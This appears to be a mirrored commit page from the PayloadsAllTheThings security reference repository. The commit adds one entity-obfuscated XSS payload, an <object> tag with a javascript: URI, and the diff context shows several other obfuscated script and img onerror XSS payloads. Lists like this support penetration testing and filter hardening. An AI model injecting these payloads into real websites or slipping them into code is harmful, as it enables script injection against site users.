gitea-mirror/PayloadsAllTheThings
1
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2025-12-12 15:49:38 -08:00
Code Issues Packages Projects Releases Wiki Activity

Added XSS <object> payload

Browse Source
This commit is contained in:
Lorenzo Grazian
2021-09-02 15:14:29 +02:00
committed by GitHub
parent 0f94adafe5
commit 7369ee28b3
1 changed files with 1 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files

1
XSS Injection/README.md
View File

@@ -191,6 +191,7 @@ Most tools are also suitable for blind XSS attacks:
<script>\u0061lert('22')</script> <script>\u0061lert('22')</script>
<script>eval('\x61lert(\'33\')')</script> <script>eval('\x61lert(\'33\')')</script>
<script>eval(8680439..toString(30))(983801..toString(36))</script> //parseInt("confirm",30) == 8680439 && 8680439..toString(30) == "confirm" <script>eval(8680439..toString(30))(983801..toString(36))</script> //parseInt("confirm",30) == 8680439 && 8680439..toString(30) == "confirm"
<object/data="jav&#x61;sc&#x72;ipt&#x3a;al&#x65;rt&#x28;23&#x29;">
// Img payload // Img payload
<img src=x onerror=alert('XSS');> <img src=x onerror=alert('XSS');>